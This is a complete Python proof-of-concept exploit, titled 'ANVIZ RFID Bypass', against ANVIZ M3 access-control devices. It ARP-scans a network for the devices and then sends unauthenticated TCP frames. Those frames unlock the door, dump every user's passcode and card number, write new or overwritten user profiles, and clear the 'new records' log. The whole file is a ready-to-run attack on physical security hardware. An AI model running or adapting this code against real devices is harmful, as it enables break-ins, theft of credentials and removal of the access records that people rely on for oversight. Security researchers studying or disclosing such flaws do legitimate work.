#!/usr/bin/python3
"""Command-line client for ANVIZ access-control devices.

Each sub-command (status, opendoor, serialnumber, firmwareversion, getusers,
updateuser, getrecords) opens a TCP connection to the device, sends one or
more request frames and prints the decoded answer. The "scan" sub-command
uses Scapy to ARP-scan a network for MAC addresses starting with 00:22:ca.

Request frames, as visible in the PAYLOAD_* constants below, consist of:
0xa5, four bytes (00 00 00 01 in every request), one command byte, a
two-byte big-endian data length, the data bytes, and finally a CRC-16
(appended by sendCommand).
"""

import argparse
import datetime
import os
import platform
import socket
import struct
import sys
from socket import AF_INET

PROGNAME = "ANVIZ M3 RFID PoC"
AUTHOR = "WizLab.it"
VERSION = "0.7"
BUILD = "20190508.049"

# Payloads (request frames without the trailing CRC)
PAYLOAD_STATUS = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x3c, 0x00, 0x00]
PAYLOAD_OPENDOOR = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x5e, 0x00, 0x00]
PAYLOAD_SERIAL_NUMBER = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x24, 0x00, 0x00]
PAYLOAD_FIRMWARE_VERSION = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x30, 0x00, 0x00]
PAYLOAD_GET_USERS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x72, 0x00, 0x02, 0x01, 0x0a]
PAYLOAD_GET_USERS_CONTINUE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x72, 0x00, 0x02, 0x00, 0x0a]
PAYLOAD_SEND_USER_PROFILE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x73, 0x00, 0x1f, 0x01, 0x00, 0x00]
PAYLOAD_GET_ALL_RECORDS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x01, 0x0a]
PAYLOAD_GET_ALL_RECORDS_CONTINUE = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x00, 0x0a]
PAYLOAD_GET_NEW_RECORDS_START = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x40, 0x00, 0x02, 0x02, 0x0a]
PAYLOAD_CLEAR_NEW_RECORDS = [0xa5, 0x00, 0x00, 0x00, 0x01, 0x4e, 0x00, 0x04, 0x02, 0x00, 0x00, 0x0a]


#
# Get device status
#
def status(args):
    """Print the six 3-byte big-endian counters returned by the status command.

    args must provide ip_address and port. Exits with status 1 on any
    socket error.
    """
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Retrieving device status...")
            deviceStatus = sendCommand(s, PAYLOAD_STATUS)
            print(" - Users: %d" % int.from_bytes(deviceStatus[0:3], "big"))
            print(" - Fingerprints: %d" % int.from_bytes(deviceStatus[3:6], "big"))
            print(" - Passwords: %d" % int.from_bytes(deviceStatus[6:9], "big"))
            print(" - Badges: %d" % int.from_bytes(deviceStatus[9:12], "big"))
            print(" - All Records: %d" % int.from_bytes(deviceStatus[12:15], "big"))
            print(" - New Records: %d\n" % int.from_bytes(deviceStatus[15:18], "big"))
            # The "with" block closes the socket; only the half-close is explicit.
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Open door function
#
def opendoor(args):
    """Send the open-door command to the device at args.ip_address:args.port."""
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Opening door...")
            sendCommand(s, PAYLOAD_OPENDOOR)
            print("Door open!\n")
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Scan network function
#
def scan(args):
    """ARP-scan args.network (CIDR, mask 16-32) and list ANVIZ devices.

    A host is reported when its MAC address starts with "00:22:ca:".
    Requires Scapy; on Linux it also requires an effective user id of 0.
    Exits with status 1 if a precondition is not met.
    """
    # Check operating system
    system = platform.system()
    if system == "Linux":
        # Root is identified by the effective *user* id, not the group id.
        if os.geteuid() != 0:
            print("Scan requires root\n")
            sys.exit(1)
    elif system != "Windows":
        print("Operating system is: " + system + "\nScan could not work here...")

    # Check if scapy is available
    try:
        from scapy.all import srp, Ether, ARP, conf
        conf.verb = 0
    except ImportError as msg:
        print("Error loading Scapy ({})\nPlease install Scapy with command:\n pip3 install scapy\n".format(msg))
        sys.exit(1)

    # Check network
    try:
        ipAndMask = args.network.split("/")
        if len(ipAndMask) != 2:
            raise ValueError("Invalid network")
        socket.inet_pton(AF_INET, ipAndMask[0])
        maskBits = int(ipAndMask[1])
        if (maskBits < 16) or (maskBits > 32):
            raise ValueError("Invalid network")
    except (OSError, ValueError):
        print("Invalid network (example: 192.168.1.0/24) [Mask 16-32]\n")
        sys.exit(1)

    # Perform network scan
    print("Scanning network...\n")
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=args.network), timeout=3)
    devicesFound = 0
    for snd, rcv in ans:
        if rcv[ARP].hwsrc.startswith("00:22:ca:"):
            devicesFound += 1
            print(" - ANVIZ device at IP %s (MAC: %s)" % (rcv[ARP].psrc, rcv[ARP].hwsrc))
    print(("\n" if (devicesFound > 0) else "") + "Scan complete (" + str(devicesFound) + " device" + ("" if (devicesFound == 1) else "s") + " found)\n")


#
# Get device serial number
#
def serialnumber(args):
    """Print the device serial number (response decoded as UTF-8)."""
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Retrieving serial number...")
            serial = sendCommand(s, PAYLOAD_SERIAL_NUMBER)
            print("Serial number: %s\n" % serial.decode("utf-8"))
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Get device firmware version
#
def firmwareversion(args):
    """Print the first 9 bytes of the firmware-version response as UTF-8."""
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Retrieving firmware version...")
            firmware = sendCommand(s, PAYLOAD_FIRMWARE_VERSION)
            print("Firmware version: %s\n" % firmware[0:9].decode("utf-8"))
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Get users on device
#
def getusers(args):
    """Print a table of all users, fetching packets until an empty one arrives."""
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Retrieving users...")
            print("." + ("-" * 58) + ".")
            print("| " + "ID".ljust(10, " ") + "| " + "PASSCODE".ljust(10, " ") + "| " + "CARD ID".ljust(10, " ") + "| " + "NAME".ljust(20, " ") + " |")
            print("|" + ("-" * 11) + "+" + ("-" * 11) + "+" + ("-" * 11) + "+" + ("-" * 22) + "|")
            isLastPacket = decodeUsersPacket(sendCommand(s, PAYLOAD_GET_USERS_START))
            while not isLastPacket:
                isLastPacket = decodeUsersPacket(sendCommand(s, PAYLOAD_GET_USERS_CONTINUE))
            print("'" + ("-" * 58) + "'")
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Build the "send user profile" request
#
def buildUserProfilePayload(userid, userpass, usercard, username):
    """Return a new request (list of ints) that writes one user profile.

    The module-level PAYLOAD_SEND_USER_PROFILE template is copied, never
    modified. The username is cut to 10 characters and NUL-padded.

    Raises ValueError if a numeric field is out of range, or
    UnicodeEncodeError (a ValueError subclass) if username is not ASCII.
    """
    if (userid < 1) or (userid > 65535):
        raise ValueError("Invalid user ID")
    if (userpass < 1) or (userpass > 999999):
        raise ValueError("Invalid user passcode")
    if (usercard < 1) or (usercard > 16777215):
        raise ValueError("Invalid user card")

    # Copy first: "+=" on the shared template list would extend it in place.
    payload = list(PAYLOAD_SEND_USER_PROFILE)
    # ">L" packs 4 bytes; dropping the first one leaves a 3-byte big-endian value.
    payload += struct.pack(">L", userid)[1:]
    # Low 20 bits carry the passcode; 0x6 goes in the top nibble
    # (presumably the passcode digit count - confirm against the protocol spec).
    payload += struct.pack(">L", ((userpass & 0x000FFFFF) | 0x00600000))[1:]
    payload += bytes([0x00])
    payload += struct.pack(">L", usercard)[1:]
    payload += username[0:10].encode("ASCII").ljust(10, bytes([0x00]))
    payload += bytes([0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40])
    return payload


#
# Update user on device
#
def updateuser(args):
    """Create or overwrite a user profile on the device.

    Reads userid, userpass, usercard, username, ip_address and port from
    args. Exits with status 1 on invalid details or on a socket error.
    """
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)

    # User details
    try:
        payload = buildUserProfilePayload(args.userid, args.userpass, args.usercard, args.username)
    except ValueError as msg:
        print("Invalid user details: %s\n" % msg)
        sys.exit(1)

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Updating user details...")
            sendCommand(s, payload)
            print("User updated")
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Get records
#
def getrecords(args):
    """Print a table of access records.

    With args.type == "new" every fetched packet is followed by a
    clear-new-records command and the next fetch restarts from the "new
    records" start request; otherwise the "continue" request is used.
    """
    (HOST, PORT) = checkIpPort(args.ip_address, args.port)
    onlyNew = (args.type == "new")
    firstRequest = PAYLOAD_GET_NEW_RECORDS_START if onlyNew else PAYLOAD_GET_ALL_RECORDS_START
    nextRequest = PAYLOAD_GET_NEW_RECORDS_START if onlyNew else PAYLOAD_GET_ALL_RECORDS_CONTINUE

    # Connect and do the dirty work
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            openSocket(s, HOST, PORT)
            print("Retrieving records...")
            print("." + ("-" * 49) + ".")
            print("| " + "ID".ljust(10, " ") + "| " + "DATE/TIME".ljust(23, " ") + "| " + "CHANNEL".ljust(10, " ") + " |")
            print("|" + ("-" * 11) + "+" + ("-" * 24) + "+" + ("-" * 12) + "|")
            isLastPacket = decodeRecordPacket(sendCommand(s, firstRequest))
            if onlyNew:
                sendCommand(s, PAYLOAD_CLEAR_NEW_RECORDS)
            while not isLastPacket:
                isLastPacket = decodeRecordPacket(sendCommand(s, nextRequest))
                if onlyNew:
                    sendCommand(s, PAYLOAD_CLEAR_NEW_RECORDS)
            print("'" + ("-" * 49) + "'")
            s.shutdown(socket.SHUT_WR)
        except socket.error as msg:
            print("\n%s\n" % msg)
            sys.exit(1)


#
# Process users packet
#
def decodeUsersPacket(users):
    """Print one table row per user in a users response.

    users[0] is the number of entries; entries are 30 bytes apart starting
    at offset 1. Returns True when the packet holds no users (empty response
    or count 0), which the caller treats as "last packet", else False.
    """
    if (not users) or (users[0] == 0):
        return True
    for i in range(users[0]):
        idx = 1 + i * 30
        user = users[idx:(idx + 29)]
        userId = int.from_bytes(user[2:5], byteorder="big", signed=False)
        userPass = int.from_bytes(user[5:8], byteorder="big", signed=False) & 0x0FFFFF
        if userPass == 0x0FFFFF:
            userPass = "no pass"
        userCard = int.from_bytes(user[8:12], byteorder="big", signed=False)
        userName = user[12:22].decode("ASCII").strip(chr(0))
        print("| " + str(userId).ljust(10, " ") + "| " + str(userPass).ljust(10, " ") + "| " + str(userCard).ljust(10, " ") + "| " + format(userName, " <20s") + " |")
    return False


#
# Process record packet
#
def decodeRecordPacket(records):
    """Print one table row per entry in a records response.

    records[0] is the number of entries; entries are 14 bytes each starting
    at offset 1. Returns True when the packet holds no records (empty
    response or count 0), else False.
    """
    if (not records) or (records[0] == 0):
        return True
    channelNames = {4: "Passcode", 8: "Card", 128: "Invalid"}
    for i in range(records[0]):
        idx = 1 + i * 14
        record = records[idx:(idx + 14)]
        recordUserId = int.from_bytes(record[2:5], byteorder="big", signed=False)
        # The timestamp is a count of seconds added to 2000-01-02 00:00:00.
        recordSeconds = int.from_bytes(record[5:9], byteorder="big", signed=False)
        recordDatetime = datetime.datetime(2000, 1, 2, 0, 0, 0) + datetime.timedelta(seconds=recordSeconds)
        recordChannel = channelNames.get(int.from_bytes(record[9:10], byteorder="big", signed=False), "Unknown")
        print("| " + str(recordUserId).ljust(10, " ") + "| " + str(recordDatetime).ljust(23, " ") + "| " + str(recordChannel).ljust(10, " ") + " |")
    return False


#
# CRC16_MCRF4XX
#
def crc16_mcrf4xx(data):
    """Return the CRC-16/MCRF4XX of data as 2 little-endian bytes.

    data is any iterable of ints 0-255. Initial value 0xFFFF, reflected
    polynomial 0x8408, no final XOR.
    """
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            if crc & 0x0001:
                crc = (crc >> 1) ^ 0x8408
            else:
                crc >>= 1
    return struct.pack("<H", crc)


#
# Check IP address and port
#
def checkIpPort(ipaddress, port):
    """Validate an IPv4 address string and a TCP port number.

    Returns (ipaddress, port) unchanged when both are valid; otherwise
    prints an error and exits with status 1.
    """
    try:
        socket.inet_pton(AF_INET, ipaddress)
        if (port < 1) or (port > 65535):
            raise ValueError("Invalid port")
    except (OSError, ValueError, TypeError):
        print("Invalid IP Address and/or Port\n")
        sys.exit(1)
    return ipaddress, port


#
# Open connection
#
def openSocket(s, host, port):
    """Connect socket s to host:port, then set a 3 second I/O timeout.

    Prints progress; exits with status 1 if the connection fails.
    """
    try:
        print("Connecting to " + host + ":" + str(port) + "... ", end="", flush=True)
        s.connect((host, port))
        s.settimeout(3)
        print("OK!")
    except socket.error as msg:
        print("\n%s\n" % msg)
        sys.exit(1)


#
# Receive an exact number of bytes
#
def recvExact(s, count):
    """Read exactly count bytes from socket s.

    A single recv() on a stream socket may return fewer bytes than asked
    for, so keep reading until the requested amount has arrived.

    Raises ConnectionError (an OSError) if the peer closes the connection
    before count bytes were received.
    """
    chunks = []
    remaining = count
    while remaining > 0:
        chunk = s.recv(remaining)
        if not chunk:
            raise ConnectionError("Connection closed before the full response was received")
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


#
# Send request and receive response
#
def sendCommand(s, payload):
    """Send payload plus its CRC over s and return the response data bytes.

    The response is read as 3 + 3 bytes that are discarded, a 3-byte
    big-endian data length, the data itself and a 2-byte CRC (not verified).
    Prints an error and exits with status 1 on any socket error.
    """
    try:
        request = list(payload)
        request += crc16_mcrf4xx(payload)
        s.sendall(bytearray(request))  # Send request (payload + CRC)
        recvExact(s, 3)  # Receive header (3 bytes)
        recvExact(s, 3)  # Receive packet type (3 bytes)
        length = int.from_bytes(recvExact(s, 3), byteorder="big", signed=False)  # Response length (3 bytes)
        response = recvExact(s, length)  # Read "length" number of bytes
        recvExact(s, 2)  # Receive CRC (2 bytes)
    except socket.error as msg:
        print("Communication error: {}\n".format(msg))
        sys.exit(1)
    return response


#
# Argument parser
#
def addDeviceArguments(subparser):
    """Add the ip_address and optional port positionals shared by device commands."""
    subparser.add_argument("ip_address", help="device IP Address")
    subparser.add_argument("port", type=int, help="device port (1-65535) [default: %(default)s]", default=5010, nargs="?")


def buildParser():
    """Create the argparse parser with one sub-command per device operation."""
    parser = argparse.ArgumentParser(description="ANVIZ RFID Bypass")
    parser.add_argument("-v", "--version", help="show program version", action="store_true")
    subparsers = parser.add_subparsers()

    parser_scan = subparsers.add_parser("scan", help="scan network looking for ANVIZ devices")
    parser_scan.add_argument("network", help="network address (example: 192.168.1.0/24)")
    parser_scan.set_defaults(func=scan)

    parser_status = subparsers.add_parser("status", help="Device status")
    addDeviceArguments(parser_status)
    parser_status.set_defaults(func=status)

    parser_opendoor = subparsers.add_parser("opendoor", help="Open the door")
    addDeviceArguments(parser_opendoor)
    parser_opendoor.set_defaults(func=opendoor)

    parser_serialnumber = subparsers.add_parser("serialnumber", help="Get device serial number")
    addDeviceArguments(parser_serialnumber)
    parser_serialnumber.set_defaults(func=serialnumber)

    parser_firmwareversion = subparsers.add_parser("firmwareversion", help="Get device firmware version")
    addDeviceArguments(parser_firmwareversion)
    parser_firmwareversion.set_defaults(func=firmwareversion)

    parser_getusers = subparsers.add_parser("getusers", help="Retrieve users on device")
    addDeviceArguments(parser_getusers)
    parser_getusers.set_defaults(func=getusers)

    parser_updateuser = subparsers.add_parser("updateuser", help="Update user on device")
    parser_updateuser.add_argument("userid", type=int, help="user ID (1-65535)")
    parser_updateuser.add_argument("userpass", type=int, help="passcode (000000-999999)")
    parser_updateuser.add_argument("usercard", type=int, help="user card (1-16777215)")
    parser_updateuser.add_argument("username", help="user name (max. 10 characters)")
    addDeviceArguments(parser_updateuser)
    parser_updateuser.set_defaults(func=updateuser)

    parser_getrecords = subparsers.add_parser("getrecords", help="Retrieve records")
    parser_getrecords.add_argument("type", choices=["all", "new"], help="Retrieve whether all or new records")
    addDeviceArguments(parser_getrecords)
    parser_getrecords.set_defaults(func=getrecords)

    return parser


#
# MAIN PROGRAM
#
def main():
    """Parse the command line and run the selected sub-command."""
    parser = buildParser()
    args = parser.parse_args()
    if args.version:
        print("{0}\nVersion {1} ({2})\nby {3}\n".format(PROGNAME, VERSION, BUILD, AUTHOR))
    elif hasattr(args, "func"):
        args.func(args)
    else:
        parser.print_help()


if __name__ == "__main__":
    main()